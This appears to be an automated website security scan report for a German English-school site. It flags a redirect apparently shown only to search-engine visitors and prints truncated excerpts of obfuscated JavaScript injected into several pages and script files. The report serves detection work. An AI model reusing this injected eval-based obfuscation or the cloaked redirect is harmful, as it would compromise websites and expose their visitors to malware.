Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.teenglish-elmshorn.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.teenglish-elmshorn.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 19:41:23 GMT Location: http://www.wordimpressive.com/Connections/clik.php Server: Apache Content-Length: 334 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.teenglish-elmshorn.com/ | 200 OK Content-Length: 10417 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=100;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,100,107,108,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,97,109,110,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,114,110,111,39,11 Antivirus reports:
| ||
http://www.teenglish-elmshorn.com/jquery-1.4.2.min.js | 200 OK Content-Length: 74550 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=131;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,107,97,93,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,104,99,95,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,114,110,111,39,113,1 Antivirus reports:
| ||
http://maps.google.com/maps/api/js?sensor=false&language=de®ion=DE | 200 OK Content-Length: 4950 Content-Type: text/javascript | clean |
http://www.teenglish-elmshorn.com/teenglish.v3.js | 200 OK Content-Length: 6427 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=131;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,107,97,93,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,104,99,95,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,114,110,111,39,113,1 Antivirus reports:
| ||
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 6875 Content-Type: text/javascript | clean |
http://www.teenglish-elmshorn.com/privacy.html | 200 OK Content-Length: 10385 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=25;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,112,102,113,106,113,27,52,24,93,105,94,108,101,94,104,111,37,91,107,95,92,107,93,62,102,96,100,93,103,110,35,30,97,95,108,92,100,93,32,35,54,4,2,6,4,27,23,24,25,111,106,112,105,112,40,110,105,91,25,55,27,30,96,109,110,107,49,39,40,11 Antivirus reports:
| ||
http://www.teenglish-elmshorn.com/test404page.js | 200 OK Content-Length: 10067 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=100;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,100,107,108,25,55,27,91,103,92,111,104,92,102,109,40,94,105,93,90,110,96,60,100,94,103,96,101,108,33,33,100,93,106,90,103,96,30,33,52,7,5,4,2,25,26,27,23,97,109,110,41,106,106,92,26,56,23,31,97,110,111,103,50,40,41,114,110,111,39,11 Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=teenglish-elmshorn.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://teenglish-elmshorn.com/
Result: teenglish-elmshorn.com is not infected or malware details are not published yet.
Result: teenglish-elmshorn.com is not infected or malware details are not published yet.